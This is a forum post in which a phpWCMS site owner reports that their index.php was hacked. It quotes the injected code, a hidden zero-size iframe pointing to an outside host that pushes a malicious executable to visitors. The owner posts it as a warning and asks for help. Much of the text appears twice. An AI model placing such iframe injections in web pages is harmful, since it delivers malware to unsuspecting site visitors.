index.php hack
Posted: Sun 24. Feb 2008, 03:17
My index.php on an installation of v1.2.6 was hacked. It began to throw a popup window or, since popups are blocked an Alert message. In IE the Alert message reads "Free Downloads" with the standard yellow triangle, and OK button and an X close button in the upper right. In Firefox the alert window reads
Opening WebVideoSetup.exe in the banner, then "You have chosen to open WebVideoSetup.exe which is an application from http:213.189.27.137. Would you like to save this file?" The window has a standard save button and the red X to close the window. I did not open the application but one of my viewer did and got a lot of ****.
I reviewed the files and found the following coded that had been added to index.php.
The URL in the code sample produces the same action of trying to popup and run the application. Note that first two lines of the code are commented off. They are in the original file as well.
I replaced the hacked index with the regular index and the problem stopped. The intent of the posting is a warning to others but I have a couple of questions.
1. This is an older version. I am running 1.3.5 on other sites but have not upgraded this installation http://www.leoff1.net as yet. Will upgrading protect me from such hacks.
2. How do they do it?
3. Are my other phpWCMS sites in danger of the same attack and how do I protect them?
Thanks for any help, information or comments.
Opening WebVideoSetup.exe in the banner, then "You have chosen to open WebVideoSetup.exe which is an application from http:213.189.27.137. Would you like to save this file?" The window has a standard save button and the red X to close the window. I did not open the application but one of my viewer did and got a lot of ****.
I reviewed the files and found the following coded that had been added to index.php.
Code: Select all
// OR
// echo spacer(5)."<br /><span class=\"v09\"> created in ".($timer->get_current('main'))." sec</span>";
echo '<iframe src="http://killbill.coolpage.biz/" width=0 height=0></iframe>';
echo "</body>\n</html>";
I replaced the hacked index with the regular index and the problem stopped. The intent of the posting is a warning to others but I have a couple of questions.
1. This is an older version. I am running 1.3.5 on other sites but have not upgraded this installation http://www.leoff1.net as yet. Will upgrading protect me from such hacks.
2. How do they do it?
3. Are my other phpWCMS sites in danger of the same attack and how do I protect them?
Thanks for any help, information or comments.